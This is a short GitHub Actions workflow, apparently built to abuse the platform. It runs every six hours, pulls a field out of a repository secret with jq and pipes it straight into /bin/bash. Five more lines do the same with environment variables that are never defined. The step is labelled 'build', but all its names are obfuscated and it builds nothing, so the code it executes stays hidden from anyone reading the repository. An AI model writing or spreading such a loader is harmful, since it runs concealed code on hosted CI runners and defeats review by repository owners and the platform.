name: chengjisi0987
on:
  workflow_dispatch:
  schedule:
    - cron: '5 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chengjisi0987
        env:
          kzb4: ${{ secrets.kzb4 }}
        run: |
          echo $kzb4 | jq -r .pr4 | /bin/bash
          echo $emksy3 | jq -r .kzl7 | /bin/bash
          echo $rvfyi9750 | jq -r .cxpad1 | /bin/bash
          echo $pkv381 | jq -r .o02 | /bin/bash
          echo $fxl1824 | jq -r .ghm5533 | /bin/bash
          echo $yc1418 | jq -r .yhyre2 | /bin/bash

